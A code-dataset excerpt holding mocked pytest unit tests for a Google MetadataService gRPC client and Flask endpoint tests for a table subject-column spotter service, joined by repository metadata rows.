@pytest.mark.asyncio
async def test_list_operations_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.ListOperationsRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.ListOperationsResponse()
)
await client.list_operations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_list_operations_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.ListOperationsResponse()
response = client.list_operations(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_list_operations_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.ListOperationsResponse()
)
response = await client.list_operations(
request={
"name": "locations",
}
)
call.assert_called()
def test_list_locations(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = locations_pb2.ListLocationsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = locations_pb2.ListLocationsResponse()
response = client.list_locations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, locations_pb2.ListLocationsResponse)
@pytest.mark.asyncio
async def test_list_locations(transport: str = "grpc"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = locations_pb2.ListLocationsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.ListLocationsResponse()
)
response = await client.list_locations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, locations_pb2.ListLocationsResponse)
def test_list_locations_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = locations_pb2.ListLocationsRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
call.return_value = locations_pb2.ListLocationsResponse()
client.list_locations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_locations_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = locations_pb2.ListLocationsRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.ListLocationsResponse()
)
await client.list_locations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_list_locations_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = locations_pb2.ListLocationsResponse()
response = client.list_locations(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_list_locations_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.ListLocationsResponse()
)
response = await client.list_locations(
request={
"name": "locations",
}
)
call.assert_called()
def test_get_location(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = locations_pb2.GetLocationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_location), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = locations_pb2.Location()
response = client.get_location(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, locations_pb2.Location)
@pytest.mark.asyncio
async def test_get_location_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = locations_pb2.GetLocationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_location), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.Location()
)
response = await client.get_location(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, locations_pb2.Location)
def test_get_location_field_headers():
client = MetadataServiceClient(credentials=ga_credentials.AnonymousCredentials())
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = locations_pb2.GetLocationRequest()
request.name = "locations/abc"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_location), "__call__") as call:
call.return_value = locations_pb2.Location()
client.get_location(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations/abc",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_location_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials()
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = locations_pb2.GetLocationRequest()
request.name = "locations/abc"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_location), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.Location()
)
await client.get_location(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations/abc",
) in kw["metadata"]
def test_get_location_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = locations_pb2.Location()
response = client.get_location(
request={
"name": "locations/abc",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_get_location_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.Location()
)
response = await client.get_location(
request={
"name": "locations",
}
)
call.assert_called()
def test_set_iam_policy(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.SetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy(
version=774,
etag=b"etag_blob",
)
response = client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
@pytest.mark.asyncio
async def test_set_iam_policy_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.SetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy_pb2.Policy(
version=774,
etag=b"etag_blob",
)
)
response = await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_set_iam_policy_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
call.return_value = policy_pb2.Policy()
client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_set_iam_policy_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
def test_set_iam_policy_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
response = client.set_iam_policy(
request={
"resource": "resource_value",
"policy": policy_pb2.Policy(version=774),
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_set_iam_policy_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
response = await client.set_iam_policy(
request={
"resource": "resource_value",
"policy": policy_pb2.Policy(version=774),
}
)
call.assert_called()
def test_get_iam_policy(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.GetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy(
version=774,
etag=b"etag_blob",
)
response = client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
@pytest.mark.asyncio
async def test_get_iam_policy_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.GetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy_pb2.Policy(
version=774,
etag=b"etag_blob",
)
)
response = await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_get_iam_policy_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
call.return_value = policy_pb2.Policy()
client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_iam_policy_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
def test_get_iam_policy_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
response = client.get_iam_policy(
request={
"resource": "resource_value",
"options": options_pb2.GetPolicyOptions(requested_policy_version=2598),
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_get_iam_policy_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
response = await client.get_iam_policy(
request={
"resource": "resource_value",
"options": options_pb2.GetPolicyOptions(requested_policy_version=2598),
}
)
call.assert_called()
def test_test_iam_permissions(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.TestIamPermissionsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse(
permissions=["permissions_value"],
)
response = client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy_pb2.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
@pytest.mark.asyncio
async def test_test_iam_permissions_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.TestIamPermissionsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse(
permissions=["permissions_value"],
)
)
response = await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy_pb2.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
def test_test_iam_permissions_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_test_iam_permissions_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse()
)
await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
def test_test_iam_permissions_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
response = client.test_iam_permissions(
request={
"resource": "resource_value",
"permissions": ["permissions_value"],
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_test_iam_permissions_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse()
)
response = await client.test_iam_permissions(
request={
"resource": "resource_value",
"permissions": ["permissions_value"],
}
)
call.assert_called()
def test_transport_close():
transports = {
"grpc": "_grpc_channel",
}
for transport, close_name in transports.items():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"grpc",
]
for transport in transports:
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
@pytest.mark.parametrize(
"client_class,transport_class",
[
(MetadataServiceClient, transports.MetadataServiceGrpcTransport),
(MetadataServiceAsyncClient, transports.MetadataServiceGrpcAsyncIOTransport),
],
)
def test_api_key_credentials(client_class, transport_class):
with mock.patch.object(
google.auth._default, "get_api_key_credentials", create=True
) as get_api_key_credentials:
mock_cred = mock.Mock()
get_api_key_credentials.return_value = mock_cred
options = client_options.ClientOptions()
options.api_key = "api_key"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=mock_cred,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
| 36.267447
| 130
| 0.675742
| 48,670
| 427,702
| 5.714362
| 0.011054
| 0.016252
| 0.02641
| 0.060435
| 0.969405
| 0.953743
| 0.942891
| 0.928739
| 0.916931
| 0.900456
| 0
| 0.004256
| 0.244088
| 427,702
| 11,792
| 131
| 36.270522
| 0.855978
| 0.218217
| 0
| 0.738382
| 0
| 0
| 0.073947
| 0.020151
| 0
| 0
| 0
| 0
| 0.129457
| 1
| 0.03135
| false
| 0.000123
| 0.00627
| 0.000246
| 0.037866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4b4af449ff5a13672805f3fbee5070f89b2c817
| 5,645
|
py
|
Python
|
tests/test_simple.py
|
oeg-upm/ssspotter
|
a9e2906c1193a9550bb7ebc3baf0d5f9b173ad50
|
[
"Apache-2.0"
] | null | null | null |
tests/test_simple.py
|
oeg-upm/ssspotter
|
a9e2906c1193a9550bb7ebc3baf0d5f9b173ad50
|
[
"Apache-2.0"
] | 2
|
2019-07-09T09:13:09.000Z
|
2021-06-01T23:58:47.000Z
|
tests/test_simple.py
|
oeg-upm/ssspotter
|
a9e2906c1193a9550bb7ebc3baf0d5f9b173ad50
|
[
"Apache-2.0"
] | null | null | null |
from app import app
import unittest
import os
from spotter import T_NON_NUM, T_LEFT_MOST, T_DISTINCT
class TestSimpleSpotter(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
# creates a test client
self.app = app.test_client()
# propagate the exceptions to the test client
self.app.testing = True
app.testing = True
def tearDown(self):
pass
def test_left_most_0(self):
fname = "sample_col_0.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_LEFT_MOST, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 0)
def test_left_most_1(self):
fname = "sample_col_1.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_LEFT_MOST, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 0)
def test_left_most_no(self):
fname = "sample_col_no.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_LEFT_MOST, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 0)
def test_non_num_0(self):
fname = "sample_col_0.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_NON_NUM, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 0)
def test_non_num_1(self):
fname = "sample_col_1.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_NON_NUM, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 1)
def test_non_num_no(self):
fname = "sample_col_no.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_NON_NUM, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], -1)
def test_distinct_num_2(self):
fname = "sample_col_2.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_DISTINCT, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 2)
def test_distinct_num_3(self):
fname = "sample_col_3.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_DISTINCT, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 3)
def test_distinct_empty(self):
fname = "sample_col_empty.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_DISTINCT, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], -1)
def test_distinct_nodata(self):
fname = "sample_col_nodata.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_DISTINCT, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], -1)
if __name__ == '__main__':
unittest.main()
| 37.885906
| 86
| 0.607086
| 742
| 5,645
| 4.432615
| 0.103774
| 0.048647
| 0.045607
| 0.054728
| 0.847978
| 0.847978
| 0.847978
| 0.847978
| 0.847978
| 0.847978
| 0
| 0.01215
| 0.241807
| 5,645
| 148
| 87
| 38.141892
| 0.756308
| 0.011515
| 0
| 0.75969
| 0
| 0
| 0.166577
| 0.003765
| 0
| 0
| 0
| 0
| 0.232558
| 1
| 0.108527
| false
| 0.023256
| 0.031008
| 0
| 0.147287
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4b8455b29a4d295ab95f6c2b45d0da1340ceb8a
| 108
|
py
|
Python
|
home/utils.py
|
eviltnan/portfolio
|
a3f82ee867f87e62adc26541afc4de74aed4b186
|
[
"MIT"
] | 7
|
2022-01-22T14:13:51.000Z
|
2022-03-25T22:24:14.000Z
|
home/utils.py
|
eviltnan/portfolio
|
a3f82ee867f87e62adc26541afc4de74aed4b186
|
[
"MIT"
] | 3
|
2019-12-06T13:34:09.000Z
|
2020-01-06T19:23:26.000Z
